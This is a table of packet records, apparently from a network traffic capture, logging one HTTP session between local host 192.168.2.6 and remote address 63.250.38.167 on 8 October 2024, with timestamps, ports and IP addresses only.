Oct 8, 2024 11:32:16.488641024 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488648891 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488678932 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.488992929 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489041090 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489051104 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489090919 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.489099026 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489108086 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489115953 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489125967 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489151955 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.489243031 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489253044 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489262104 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489270926 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489289999 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.489324093 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.489391088 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489438057 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489439964 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.489448071 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489485979 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.489578962 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489588022 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489598036 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489607096 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489617109 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489622116 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.489625931 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489634991 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489644051 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489644051 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.489655018 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489656925 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.489665031 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.489684105 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.489707947 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.492944956 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.492964983 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493014097 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.493139982 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493149996 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493159056 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493168116 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493177891 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493186951 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493189096 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.493204117 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.493237019 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.493305922 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493315935 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493324995 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493333101 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493340969 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.493343115 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493352890 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493366003 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493375063 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493385077 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493388891 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493396044 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493401051 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493412018 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493426085 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.493464947 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.493731976 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493779898 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493787050 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.493789911 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493824005 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.493894100 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493904114 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493944883 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493952036 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.493954897 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.493964911 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494036913 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494044065 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494054079 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494062901 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494071960 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494081974 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494090080 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494101048 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494107962 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494107962 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494110107 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494122028 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494153023 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494153023 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494194031 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494355917 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494402885 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494412899 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494450092 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494468927 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494478941 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494488955 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494498968 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494522095 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494543076 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494591951 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494601011 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494610071 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494617939 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494626999 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494632006 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494637012 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494646072 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494653940 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494663954 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494664907 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494666100 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494673014 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494682074 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.494692087 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494705915 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.494734049 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578521013 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578535080 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578547001 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578564882 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578574896 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578583956 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578584909 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578593969 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578603983 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578624964 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578649998 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578708887 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578722954 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578732967 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578747034 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578757048 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578766108 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578769922 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578775883 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578788042 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578797102 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578798056 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578823090 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578838110 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578838110 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578847885 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578856945 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578856945 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578871012 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578881979 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578882933 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578892946 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578902960 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578905106 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578912973 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578922987 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578924894 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578933001 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578954935 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.578968048 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.578985929 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579037905 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579047918 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579080105 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579082012 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579092026 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579102039 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579123020 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579143047 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579148054 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579155922 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579165936 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579175949 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579184055 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579185963 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579199076 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579206944 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579209089 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579216957 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579242945 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579267025 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579291105 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579301119 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579309940 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579319954 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579336882 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579359055 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579381943 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579396963 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579406977 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579421997 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579428911 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579431057 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579437017 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579447031 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579454899 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579464912 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579471111 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579473972 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579483986 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579493046 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579513073 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579560995 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579596043 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579601049 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579606056 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579646111 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579663038 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579673052 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579682112 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579690933 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579700947 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579705000 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579710960 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579730034 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579762936 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579776049 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579786062 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579801083 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579809904 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579818964 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579819918 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579857111 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579885960 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579895020 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579904079 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579912901 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579921007 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.579922915 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579941034 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579967976 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.579992056 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580001116 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580010891 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580030918 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580189943 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580199957 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580209017 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580218077 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580226898 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580228090 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580235958 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580245018 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580246925 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580255032 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580269098 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580269098 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580279112 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580287933 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580291033 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580296993 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580300093 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580308914 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580317974 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580322981 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580327988 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580337048 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580347061 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580357075 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580357075 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580367088 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580375910 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580377102 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580394983 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580491066 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580499887 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580509901 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580547094 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580564022 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580588102 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580596924 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580605984 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580629110 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580676079 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580684900 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580693960 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580703020 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580713034 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580718994 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580723047 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580730915 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580739975 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.580744982 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.580764055 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.622529030 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669193029 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669253111 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669267893 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669276953 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669286013 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669296026 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669306040 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669315100 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669316053 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669323921 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669333935 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669342995 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669354916 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669363976 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669373035 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669374943 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669382095 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669393063 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669403076 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669409990 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669413090 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669435978 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669442892 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669447899 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669457912 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669467926 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669516087 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669554949 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669564962 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669573069 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669588089 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669593096 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669598103 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669606924 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669615030 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669616938 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669625044 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669634104 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669637918 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669644117 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669671059 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669697046 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669707060 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669744015 CEST	50004	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:32:16.669841051 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669850111 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669858932 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669867039 CEST	80	50004	63.250.38.167	192.168.2.6
Oct 8, 2024 11:32:16.669877052 CEST	80	50004	63.250.38.167	192.168.2.6
